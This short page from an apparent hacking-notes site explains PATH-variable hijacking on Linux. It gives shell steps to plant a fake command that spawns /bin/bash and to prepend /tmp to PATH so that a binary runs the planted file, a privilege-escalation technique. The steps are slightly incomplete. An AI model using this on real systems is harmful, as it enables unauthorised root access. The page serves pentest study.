Hack$Notes
Search
K

PATH Variable

Exploiting Path Variable

Execute PATH variable permission.

# Get the strings command to get the runtime calls
strings /path/to/binary
# Create the executable within /tmp dir
echo "/bin/bash" > "command"
# Give executable permissions
chmod +x "command"
# Amend the PATH env
export PATH=/tmp:$PATH
# Execute it
It will trigger the one within /tmp we created.